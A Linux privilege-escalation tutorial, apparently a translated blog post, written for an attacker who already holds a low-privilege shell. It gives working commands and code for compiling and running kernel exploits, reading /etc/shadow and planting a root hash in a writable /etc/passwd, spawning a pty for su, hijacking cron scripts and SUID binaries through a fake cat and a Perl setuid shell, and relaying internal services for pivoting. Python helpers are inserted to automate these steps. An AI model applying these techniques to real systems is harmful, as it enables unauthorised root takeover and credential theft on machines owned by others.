Owning a box means owning it completely. Often we can take over a server's web service, only for an administrator who patches faster than Western reporters run to kill the intranet pivot in the cradle. Privilege escalation on Linux involves not only exploits but also a great deal of system configuration. Below are the escalation methods I have summarized.
A few prerequisites
A low-privilege shell has already been obtained.
The compromised machine has the usual tools such as nc, python and perl.
Files can be uploaded to and downloaded from the machine.
Kernel exploit privilege escalation
Mention Dirty COW and the ops people shed two lines of tears; we shed two lines of nosebleed. A kernel exploit is almost always the first escalation approach that comes to mind, but a kernel exploit that works everywhere is very rare, so the first step is to collect information about the system.
View the distribution version:
cat /etc/issue
cat /etc/*-release
View the kernel version:
uname -a
Here is what I found on a test machine:
# uname -a
Linux xxxxx 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
# cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.04
DISTRIB_CODENAME=lucid
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"
This gives us the kernel version (2.6.32-21, PAE), the CPU architecture (i686) and the distribution release (Ubuntu 10.04).
Now the search can start. Most kernel vulnerabilities can be located quickly from the kernel version.
Use searchsploit, which ships with Kali, to search Exploit-DB for exploit code:
searchsploit linux 2.6 ubuntu priv esc
Results:
That is a lot of results, so add system information to narrow the range:
searchsploit linux priv esc 2.6 ubuntu 10
The list of candidate exploits is now much shorter. Sadly there is no shortcut: we have to open each exploit and read its stated requirements. Most exploits document the conditions under which they work, so with some patience we can quickly discard the ones whose conditions are not met. For example, the third exploit targets a particular filesystem, so it is excluded.
After the tedious search, 15704.c looked promising, so I uploaded the source and then:
# gcc exp.c
# ls
exp.c  a.out
# ./a.out
id
uid=0(root) gid=0(root)
Compile the exploit and run it. Notice that it printed nothing after execution, but we actually have a root shell (after running an exploit, always type a command, otherwise you cannot tell whether it succeeded or hung).
Searching Exploit-DB is cumbersome, but it more or less guarantees that no vulnerability is missed. For a lazier first pass, try https://www.kernel-exploits.com/, where exploits are sorted by kernel version and many are already compiled.
For example, searching for 2.6.32:
The RDS binary there happens to work. "I collected the information, I uploaded the exploit, I was root."
Of course, the above is the ideal case. Very often we land on a miserable server with no gcc, and then we have to compile locally. Local compilation means not only following the compiler flags in the exploit's comments but also adjusting them by hand, for example adding -m32 to gcc to produce a 32-bit binary for an i686 target. Build on a system whose glibc is no newer than the target's, or the binary will fail at load time with missing GLIBC symbol versions. Compilation problems are endless; when in doubt, search the error message. I will not repeat that here.
When the kernel version has no good matching exploit, check the filesystem types:
cat /etc/fstab
and the installed packages:
dpkg -l
rpm -qa
and then do another tedious search; you may find a usable bug.
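The screening step above (reading each exploit's stated kernel range, architecture and distribution, and discarding the ones that cannot apply) is easy to get wrong by hand because kernel versions do not compare as strings: "2.6.9" sorts after "2.6.32". The following Python is an added example, not code from the original post; it parses the uname and release output shown above and screens a list of candidates. The CANDIDATES table is hypothetical metadata of the kind you would transcribe from an exploit's header comment, not real Exploit-DB entries.

```python
import re

# Constructed sample output, matching what the test box above printed.
UNAME_A = ("Linux xxxxx 2.6.32-21-generic-pae #32-Ubuntu SMP "
           "Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux")
RELEASE = """DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.04
DISTRIB_CODENAME=lucid
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"
"""

# Hypothetical exploit requirements, as transcribed from each candidate's
# header comment (names and ranges are made up for the example).
CANDIDATES = [
    {"name": "exp-A", "min": "2.6.30", "max": "2.6.36",
     "arch": {"i686", "x86_64"}, "distro": {"ubuntu"}},
    {"name": "exp-B", "min": "2.6.9", "max": "2.6.9",
     "arch": {"i686"}, "distro": set()},
    {"name": "exp-C", "min": "2.6.37", "max": "3.0.0",
     "arch": {"x86_64"}, "distro": set()},
]


def kernel_tuple(version):
    """'2.6.32-21-generic-pae' -> (2, 6, 32). Tuples compare numerically,
    so 2.6.9 < 2.6.32, which a plain string comparison gets backwards."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError("not a kernel version: %r" % version)
    return tuple(int(x) if x is not None else 0 for x in m.groups())


def parse_uname(line):
    """Return (kernel tuple, release string, arch) from 'uname -a' output.
    The arch is the field just before the trailing 'GNU/Linux'."""
    parts = line.split()
    release = parts[2]
    arch = parts[-2]
    return kernel_tuple(release), release, arch


def parse_release(text):
    """KEY=VALUE lines from /etc/*-release into a dict (quotes stripped)."""
    kv = {}
    for line in text.splitlines():
        if "=" in line:
            k, v = line.split("=", 1)
            kv[k.strip()] = v.strip().strip('"')
    return kv


def screen(uname_line, release_text, candidates):
    """Names of candidates whose kernel range, arch and distro all match."""
    kver, _, arch = parse_uname(uname_line)
    distro = parse_release(release_text).get("DISTRIB_ID", "").lower()
    keep = []
    for c in candidates:
        if not (kernel_tuple(c["min"]) <= kver <= kernel_tuple(c["max"])):
            continue  # kernel outside the exploit's stated range
        if c["arch"] and arch not in c["arch"]:
            continue  # exploit is for another CPU architecture
        if c["distro"] and distro not in c["distro"]:
            continue  # exploit relies on a distribution-specific detail
        keep.append(c["name"])
    return keep


if __name__ == "__main__":
    print(screen(UNAME_A, RELEASE, CANDIDATES))  # ['exp-A']
```

The range check is only a first filter; the exploit's comments usually list further conditions (a specific filesystem, a loaded module, a config option) that still have to be verified by reading the source.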
Finally, a few things to keep in mind when exploiting kernel vulnerabilities:
1. Read the source code, or it may not even compile.
2. Read the source code, or after all the effort of compiling you may discover it does not apply.
3. Read the source code, or you may run an "exploit" that deletes everything.
Also remember that a failed kernel exploit can panic the machine, which is a noisy and irreversible way to lose your shell.
Root password in passwd and shadow
The chance of running into this is small, but it is worth mentioning.
On most Linux systems, passwords are tied to the two files /etc/passwd and /etc/shadow. passwd stores the users; shadow stores the password hashes. For security reasons, passwd is readable by everyone and writable only by root, while shadow is readable only by root (and, on many distributions, the shadow group).
Here is a typical passwd file:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
Each passwd line is separated by colons: the first field is the user name and the second is the password field. An x there means the password hash lives in shadow (so non-root users cannot see it). The most important thing in shadow is the password hash:
root:$6$urgq7sjf$4X8E9NTQTWAPIUBI9YLXLQ2MZTTZKNGZ0G/WWZODPB5EGUZ.S5IRTFDVFFD9VIVEWOUIODB/HH9BYOLGAD8U5/:16902:0:99999:7:::
daemon:*:15730:0:99999:7:::
bin:*:15730:0:99999:7:::
sys:*:15730:0:99999:7:::
sync:*:15730:0:99999:7:::
games:*:15730:0:99999:7:::
man:*:15730:0:99999:7:::
lp:*:15730:0:99999:7:::
mail:*:15730:0:99999:7:::
news:*:15730:0:99999:7:::
uucp:*:15730:0:99999:7:::
proxy:*:15730:0:99999:7:::
www-data:*:15730:0:99999:7:::
backup:*:15730:0:99999:7:::
list:*:15730:0:99999:7:::
irc:*:15730:0:99999:7:::
gnats:*:15730:0:99999:7:::
nobody:*:15730:0:99999:7:::
libuuid:!:15730:0:99999:7:::
syslog:*:15730:0:99999:7:::
mysql:!:15730:0:99999:7:::
dovecot:*:15730:0:99999:7:::
sshd:*:15730:0:99999:7:::
postfix:*:15730:0:99999:7:::
Check the permissions with:
cd /etc
ls -l passwd shadow
If passwd is writable, we can replace the x in root's password field with the hash of a password we know (for example one generated with openssl passwd -6 or mkpasswd); the system then validates the login against the hash in passwd, and that password is ours. If shadow is readable, we can copy the root hash and brute-force it with hashcat or John the Ripper.
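To make the two branches concrete, the following Python is an added example (not code from the original post) that parses passwd and shadow in the layout shown above, reports for each account where its hash actually lives, whether it is locked or crackable and whether it has UID 0, and rewrites a passwd line the way the writable-passwd trick requires. The sample files are constructed: root's hash is the one from the excerpt above, and the "legacy" and "backdoor" entries and the $1$ hash are made up to exercise the other cases. Generating the hash itself is left to openssl passwd -6 or mkpasswd.

```python
# Constructed excerpts in /etc/passwd and /etc/shadow layout.
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
backdoor:x:0:0:oops:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
legacy:$1$abcdefgh$ZLwOPe.j/0QR6uK6KoRvH.:1001:1001::/home/legacy:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
"""

SHADOW = """root:$6$urgq7sjf$4X8E9NTQTWAPIUBI9YLXLQ2MZTTZKNGZ0G/WWZODPB5EGUZ.S5IRTFDVFFD9VIVEWOUIODB/HH9BYOLGAD8U5/:16902:0:99999:7:::
daemon:*:15730:0:99999:7:::
www-data:*:15730:0:99999:7:::
mysql:!:15730:0:99999:7:::
nobody:*:15730:0:99999:7:::
"""

# crypt(3) hash prefixes; the type decides the hashcat/john mode and the cost.
HASH_TYPES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
              "$2": "bcrypt", "$y$": "yescrypt"}


def parse_passwd(text):
    """user -> fields; the 7-field layout is name:pw:uid:gid:gecos:home:shell."""
    users = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 7 or line.startswith("#"):
            continue
        users[f[0]] = {"hash": f[1], "uid": int(f[2]), "gid": int(f[3]),
                       "gecos": f[4], "home": f[5], "shell": f[6]}
    return users


def parse_shadow(text):
    """user -> password field (hash, or a lock marker such as * or !)."""
    hashes = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) >= 2:
            hashes[f[0]] = f[1]
    return hashes


def effective_hash(user, passwd, shadow):
    """The hash login actually checks: a non-'x' passwd field is used as-is,
    otherwise the shadow entry. This is why a writable passwd is enough."""
    h = passwd[user]["hash"]
    return h if h != "x" else shadow.get(user)


def classify(h):
    if h is None:
        return "missing"
    if h == "":
        return "empty (no password needed)"
    if h == "*" or h.startswith("!"):
        return "locked"
    for prefix, name in HASH_TYPES.items():
        if h.startswith(prefix):
            return name
    return "descrypt/unknown"


def triage(passwd_text, shadow_text):
    """Per-account summary: UID 0, hash stored in passwd, hash type."""
    passwd, shadow = parse_passwd(passwd_text), parse_shadow(shadow_text)
    return {u: {"uid0": passwd[u]["uid"] == 0,
                "hash_in_passwd": passwd[u]["hash"] != "x",
                "hash_type": classify(effective_hash(u, passwd, shadow))}
            for u in passwd}


def plant_hash(passwd_text, user, new_hash):
    """Rewrite one passwd line so login checks new_hash (writable-passwd trick)."""
    out = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[0] == user:
            f[1] = new_hash
            line = ":".join(f)
        out.append(line)
    return "\n".join(out) + "\n"
```

In the sample, triage() flags the second UID 0 account, shows that "legacy" keeps its (weak, md5crypt) hash in world-readable passwd and therefore needs no shadow access to crack, and reports root as sha512crypt. Write the result of plant_hash() back with the same ownership and mode as the original file, and keep a copy of the original line so the change can be reverted.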
Password reuse
Many administrators reuse passwords, so the database or web backend password may also be the root password.
And then?
What if I have a (suspected) root password? The first thought is to log in over SSH. However, SSH very likely disables root login, or firewall rules keep you out. Think again: don't we already have a low-privilege shell? Find a way to "type" the password into it. Obviously, running sudo or su directly in a bare low-privilege shell does not work. For security reasons, sudo and su read the password from the controlling terminal (TTY) rather than from standard input; in other words, they read from the terminal device, not from characters piped through bash. So to enter a password we have to emulate a terminal. Python can do this. In the shell, type:
python -c 'import pty;pty.spawn("/bin/sh")'
Python wraps a new shell in a pseudo-terminal; after that, sudo, su and similar commands work. (If www-data is not in sudoers, use su directly: it only needs the root password.)
$ python -c 'import pty;pty.spawn("/bin/sh")'
$ sudo su
[sudo] password for www-data: 123456
Sorry, try again.
[sudo] password for www-data:
Scheduled tasks
The system may have scheduled tasks; typically they are managed by crontab and run with the privileges of their owning user. A non-root user cannot list root's crontab, but the system-wide scheduled tasks under /etc can be listed:
ls -l /etc/cron*
By default these run as root, and if you are lucky enough to meet an administrator who left a script writable by any user, you can modify the script to get a root shell. Note that cron runs jobs with a minimal environment and a restricted PATH, so a payload written into such a script should use absolute paths.
SUID
SUID is a special file permission bit that lets a user run a file with the privileges of the file's owner. The passwd command, for example, runs as root so that it can modify shadow.
Here is an experiment (environment: Ubuntu 16.04).
C source code:
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);                  // run as root
    system("id");
    system("cat /etc/shadow");
    return 0;
}
Compile and set the permissions as root:
gcc suid.c -o suid-exp
chmod 4755 ./suid-exp    # this sets the SUID bit
ls -l
Output:
-rwsr-xr-x 1 root root 8632 Mar 15 20:53 suid-exp
Note the s in the owner's execute position, which indicates that the program has the SUID bit set.
Next, switch to a normal user and run it:
su test
./suid-exp
You can see that the program really runs as root.
SUID programs are a frequent source of escalation vulnerabilities; nmap, for example, once let a low-privileged user run arbitrary commands as root through its interactive mode. Beyond abusing a program's own features, we can also try hijacking environment variables. The C program above calls system(), which passes the environment on to the shell it spawns, so by manipulating the environment we can execute arbitrary commands.
In the shell of the low-privilege user test:
cat >> /tmp/cat <<EOF
#!/usr/bin/python
print "this is not the true cat"
print "here is a root shell!"
import pty;pty.spawn("/bin/sh")
EOF
# a fake cat in /tmp that uses python to launch a shell
chmod +x /tmp/cat        # the fake cat must be executable or sh will not run it
PATH=/tmp:$PATH          # set PATH so /tmp is searched first
./suid-exp               # because PATH is hijacked, system("cat /etc/shadow") runs our fake cat
Run results
Another situation: the administrator set SUID on a program whose code never calls setuid(0). When we hijack such a program, our own payload must call setuid(0) to become root; otherwise bash notices that the effective uid differs from the real uid and drops the privilege. A small trick: use a Perl script to setuid:
#!/usr/bin/perl
$< = $>;                        # real uid = effective uid (0)
$( = $) = 0;                    # real and effective gid = 0
$ENV{PATH} = "/bin:/usr/bin";   # perl runs setuid scripts in taint mode and refuses system() with an untrusted PATH
system("/bin/sh");
With this simple script as the hijack payload, the shell runs as root.
Network and hidden services
Some services are configured to be reachable only internally or on the local machine. By attacking them we may reach more sensitive files, or get lucky with a remote root vulnerability.
netstat -antup    # list listening and connected sockets with their owning programs (ss -antup on newer systems)
If you find a mysterious service, use netcat to forward it. This listens on port 8082 and relays each connection to remote_host:445; to expose a loopback-only service, use 127.0.0.1 and the service's port instead (traditional netcat wants -l -p 8082):
mkfifo backpipe
nc -l 8082 0<backpipe | nc remote_host 445 1>backpipe
Then look for vulnerabilities, attack, and start again from the beginning.
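The netcat-and-fifo relay above handles one connection at a time and behaves differently across netcat variants. The following Python is an added example, not code from the original post: a small multi-connection TCP relay with the same purpose, exposing a service that is bound only to loopback on the compromised host so it can be attacked from outside. The demo() function stands up a constructed loopback-only "internal" service (an upper-casing echo server) and talks to it through the relay; the service and port numbers are assumptions for the example.

```python
import socket
import threading


def pipe(src, dst):
    """Copy bytes src -> dst until EOF, then shut dst's write side so the
    peer sees EOF too (otherwise half-closed connections hang)."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle(client, target):
    """Connect to the hidden service and shovel bytes in both directions."""
    try:
        upstream = socket.create_connection(target)
    except OSError:
        client.close()
        return
    t1 = threading.Thread(target=pipe, args=(client, upstream), daemon=True)
    t2 = threading.Thread(target=pipe, args=(upstream, client), daemon=True)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    client.close()
    upstream.close()


def start_relay(listen_host, listen_port, target):
    """Listen on listen_host:listen_port and relay every connection to
    target = (host, port). Returns the listening socket; close it to stop."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def loop():
        while True:
            try:
                c, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(c, target), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv


def _echo_server():
    """Constructed stand-in for an internal service: echoes input upper-cased."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", 0))
    s.listen(1)

    def serve():
        while True:
            try:
                c, _ = s.accept()
            except OSError:
                return
            with c:
                while True:
                    d = c.recv(4096)
                    if not d:
                        break
                    c.sendall(d.upper())

    threading.Thread(target=serve, daemon=True).start()
    return s


def demo():
    """Reach the loopback-only service through the relay; returns the reply."""
    svc = _echo_server()
    relay = start_relay("127.0.0.1", 0, svc.getsockname())
    with socket.create_connection(relay.getsockname()) as c:
        c.sendall(b"hello via relay")
        c.shutdown(socket.SHUT_WR)
        got = b""
        while True:
            d = c.recv(4096)
            if not d:
                break
            got += d
    relay.close()
    svc.close()
    return got
```

In practice the call is start_relay("0.0.0.0", 8082, ("127.0.0.1", 3306)) or similar, run as the low-privilege user (ports below 1024 need root), after which the internal service is reachable on the box's external address at 8082.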
Related tools
The sections above exploit configuration errors but have not said how to find them. Two scripts:
unix-privesc-check: http://pentestmonkey.net/tools/audit/unix-privesc-check
linuxprivchecker: https://www.securitysift.com/download/linuxprivchecker.py
Both check a large number of configuration issues in detail, and the part that lists every writable file is particularly moving. Their checks are basically comprehensive enough.
For manual checking, I recommend https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Summary
Linux has many escalation paths, involving a wide range of techniques. While writing this article I kept wanting to explain the underlying knowledge, but faced with the tedious internals of the system and the many distributions, I realized how shallow my understanding is. I strongly agree with a claim often made on Linux forums: you need to know how the Linux system works. All the tricks, and all the misconfigurations, ultimately come back to how the system operates and how it manages permissions. A systematic understanding of the system is the best way to ensure security.
Linux privilege escalation: from getting started to giving up